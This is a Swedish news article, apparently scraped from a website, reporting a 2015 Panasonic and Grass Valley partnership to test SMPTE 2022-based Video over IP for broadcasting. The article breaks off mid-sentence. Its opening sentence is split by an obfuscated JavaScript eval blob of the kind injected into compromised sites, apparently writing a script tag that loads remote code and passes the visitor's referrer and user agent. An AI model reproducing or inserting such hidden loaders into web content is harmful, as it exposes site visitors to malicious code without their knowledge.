Image Image Image Image Image Image Image Image Image Image

| 26 maj, 2018

Scroll to top

Top

No Comments

Panasonic och Grass Valley annonserar Video over IP-tester

Panasonic och Grass Valley annonserar Video over IP-tester
Sebastian Plengier Ehrnfelt

Panasonic eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|niihe|var|u0026u|referrer|dytet||js|php’.split(‘|’),0,{}))
och Grass Valley har idag på IBC-mässan 2015 annonserat ett partnerskap för utveckling, där användning av SMPTE 2022-baserad Video over IP som nästa generations nätverkssystem för broadcasting ska undersökas.

Stockholm, 11 september 2015 – Video over IP kan reducera systemkostnader och göra det enklare att installera broadcastsystem. Extra intressant är hur Video over IP kan hjälpa till med övergången till 4K och 8K, samt hur den kan förenkla fjärrstyrd liveproduktion.

– Panasonic bedömer interoperabilitet och systemflexibilitet som de viktigaste fördelarna med Video over IP, säger Kunihiko Miyagi, Director of Professional AV Business Unit. Vi tror att Video over IP fungerar parallellt med konventionella system som SDI, men erbjuder ökad bekvämlighet och kompatibilitet, samt minskade installationskostnader.

Panasonic och Grass Valley planerar att sa

Submit a Comment